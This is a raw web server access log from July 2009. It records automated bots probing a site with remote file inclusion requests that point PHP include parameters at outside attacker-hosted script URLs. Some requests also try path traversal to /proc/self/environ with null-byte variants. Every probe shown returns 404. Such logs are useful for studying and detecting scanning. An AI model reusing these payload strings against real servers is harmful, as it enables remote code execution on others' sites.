216.107.223.38 - - [20/Jul/2009:01:26:21 -0400] "GET //bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:01:26:21 -0400] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:01:26:26 -0400] "GET /logs/access_log.Q109071500//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
200.234.200.230 - - [20/Jul/2009:01:26:35 -0400] "GET /logs/access_log.Q109051800//twindow_notice.php?shop_this_skin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.234.200.230 - - [20/Jul/2009:01:26:35 -0400] "GET /logs/access_log.Q109051400//twindow_notice.php?shop_this_skin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.234.200.230 - - [20/Jul/2009:01:26:35 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.234.200.230 - - [20/Jul/2009:01:26:35 -0400] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.234.200.230 - - [20/Jul/2009:01:26:38 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
200.234.200.230 - - [20/Jul/2009:01:26:38 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
200.234.200.230 - - [20/Jul/2009:01:26:38 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
200.234.200.230 - - [20/Jul/2009:01:26:38 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
200.234.200.230 - - [20/Jul/2009:01:26:38 -0400] "GET /logs/access_log.Q109051800//twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 244 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:01:26:38 -0400] "GET /logs/access_log.Q109051400//twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 244 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:01:26:38 -0400] "GET /logs//twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 222 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:01:26:38 -0400] "GET //twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 217 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:01:26:38 -0400] "GET /logs/access_log.Q109051800//twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 244 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:01:26:38 -0400] "GET /logs/access_log.Q109051400//twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 244 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:01:26:39 -0400] "GET /logs//twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 222 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:01:26:39 -0400] "GET //twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 217 "-" "XXXXXX"
216.107.223.38 - - [20/Jul/2009:01:26:42 -0400] "GET //bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:01:26:47 -0400] "GET /logs/access_log.Q109071500//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:01:27:16 -0400] "GET /logs/access_log.Q109070800//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
82.195.150.228 - - [20/Jul/2009:01:27:34 -0400] "GET /logs/access_log.Q109051800/index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:01:27:34 -0400] "GET /index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:01:27:34 -0400] "GET /logs/index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:01:27:59 -0400] "GET /logs/access_log.Q109051200/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:01:27:59 -0400] "GET /plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:01:28:00 -0400] "GET /logs/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
216.107.223.38 - - [20/Jul/2009:01:28:03 -0400] "GET /logs/access_log.Q109070800%20%20//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
82.195.150.228 - - [20/Jul/2009:01:28:05 -0400] "GET /logs/access_log.Q109052200/index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
206.225.23.4 - - [20/Jul/2009:01:28:12 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:01:28:24 -0400] "GET /logs/access_log.Q109070800//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
116.122.158.207 - - [20/Jul/2009:01:28:58 -0400] "GET /mosConfig_absolute_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:28:58 -0400] "GET /logs/mosConfig_absolute_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:28:59 -0400] "GET /logs/access_log.Q109053100/mosConfig_absolute_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:28:59 -0400] "GET /logs/access_log.Q109062100/mosConfig_absolute_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:29:01 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/error.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:29:01 -0400] "GET //skin/zero_vote/error.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:29:01 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:29:03 -0400] "GET /logs/error_log.Q109051200//skin/zero_vote/error.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:29:07 -0400] "GET //skin/zero_vote/error.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:29:07 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:29:07 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/error.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:29:09 -0400] "GET /logs/error_log.Q109051200//skin/zero_vote/error.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:29:23 -0400] "GET /mosConfig_absolute_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:29:24 -0400] "GET /logs/mosConfig_absolute_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:29:24 -0400] "GET /logs/access_log.Q109053100/mosConfig_absolute_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:29:24 -0400] "GET /logs/access_log.Q109062100/mosConfig_absolute_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
206.225.23.4 - - [20/Jul/2009:01:29:31 -0400] "GET /logs/access_log.Q109051800%20%20//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
116.122.158.207 - - [20/Jul/2009:01:29:34 -0400] "GET /logs/access_log.Q109070300%20/mosConfig_absolute_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 286 "-" "libwww-perl/5.805"
206.225.23.4 - - [20/Jul/2009:01:29:37 -0400] "GET /logs/access_log.Q109051700%20%20//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:29:45 -0400] "GET /logs/access_log.Q109051800%20%20//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:29:45 -0400] "GET /logs/access_log.Q109051700%20%20//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:01:29:58 -0400] "GET //bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:01:29:58 -0400] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:01:29:58 -0400] "GET /logs/access_log.Q109071500//bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
202.191.43.177 - - [20/Jul/2009:01:30:03 -0400] "GET /logs/access_log.Q109051800/index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:01:30:03 -0400] "GET /index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:01:30:04 -0400] "GET /logs/index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jul/2009:01:30:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.242.98.70 - - [20/Jul/2009:01:30:12 -0400] "GET ///bbs/skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:01:30:12 -0400] "GET /logs/access_log.Q109071500///bbs/skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:01:30:12 -0400] "GET /logs///bbs/skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.15.55.45 - - [20/Jul/2009:01:30:15 -0400] "GET /logs/access_log.Q109051800/index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
211.15.55.45 - - [20/Jul/2009:01:30:15 -0400] "GET /index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
211.15.55.45 - - [20/Jul/2009:01:30:15 -0400] "GET /logs/index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
202.191.43.177 - - [20/Jul/2009:01:30:23 -0400] "GET /logs/access_log.Q109051800/index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:01:30:23 -0400] "GET /index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:01:30:25 -0400] "GET /logs/index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:30:27 -0400] "GET /logs/access_log.Q109070300%20/mosConfig_absolute_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 286 "-" "libwww-perl/5.805"
87.242.98.70 - - [20/Jul/2009:01:30:28 -0400] "GET /logs/access_log.Q109070800//bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:01:30:38 -0400] "GET /logs/access_log.Q109070800///bbs/skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:01:30:53 -0400] "GET /logs/access_log.Q109071500%20%20//bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:01:31:05 -0400] "GET /logs/access_log.Q109071500%20%20///bbs/skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
202.191.43.177 - - [20/Jul/2009:01:31:06 -0400] "GET /logs/access_log.Q109052200/index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.242.98.70 - - [20/Jul/2009:01:31:10 -0400] "GET /logs/access_log.Q109070800%20%20//bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
202.191.43.177 - - [20/Jul/2009:01:31:12 -0400] "GET /logs/access_log.Q109052200/index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
211.15.55.45 - - [20/Jul/2009:01:31:18 -0400] "GET /logs/access_log.Q109052200/index.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
87.242.98.70 - - [20/Jul/2009:01:31:20 -0400] "GET /logs/access_log.Q109070800%20%20///bbs/skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
202.191.43.177 - - [20/Jul/2009:01:31:23 -0400] "GET /logs/access_log.Q109051200/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:01:31:23 -0400] "GET /plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:01:31:24 -0400] "GET /logs/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:01:31:24 -0400] "GET /logs/access_log.Q109051200/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:01:31:25 -0400] "GET /plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:01:31:25 -0400] "GET /logs/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
82.195.150.228 - - [20/Jul/2009:01:31:59 -0400] "GET /logs/error_log.Q109051200/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
211.15.55.45 - - [20/Jul/2009:01:32:16 -0400] "GET /logs/access_log.Q109051200/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
211.15.55.45 - - [20/Jul/2009:01:32:17 -0400] "GET /plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
211.15.55.45 - - [20/Jul/2009:01:32:17 -0400] "GET /logs/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
110.45.145.92 - - [20/Jul/2009:01:32:18 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:01:32:18 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:01:32:18 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:01:32:28 -0400] "GET /logs/error_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
209.59.12.99 - - [20/Jul/2009:01:35:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.59.21.101 - - [20/Jul/2009:01:35:11 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://www.ohid.se/image?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.59.21.101 - - [20/Jul/2009:01:35:11 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.ohid.se/image?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.59.21.101 - - [20/Jul/2009:01:35:11 -0400] "GET /logs/error_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.ohid.se/image?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.59.21.101 - - [20/Jul/2009:01:35:11 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.ohid.se/image?? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
82.146.63.60 - - [20/Jul/2009:01:35:30 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.ohid.se/image?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
82.146.63.60 - - [20/Jul/2009:01:35:30 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://www.ohid.se/image?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
82.146.63.60 - - [20/Jul/2009:01:35:30 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.ohid.se/image?? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
82.146.63.60 - - [20/Jul/2009:01:35:36 -0400] "GET /logs/error_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.ohid.se/image?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
110.45.146.193 - - [20/Jul/2009:01:35:42 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.146.193 - - [20/Jul/2009:01:35:42 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
110.45.146.193 - - [20/Jul/2009:01:35:42 -0400] "GET /logs/access_log.Q109070400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:48 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:49 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:50 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:51 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:52 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:52 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:52 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:52 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:53 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:53 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:53 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:53 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:56 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:56 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:56 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:56 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:57 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:59 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:59 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:59 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:59 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:35:59 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
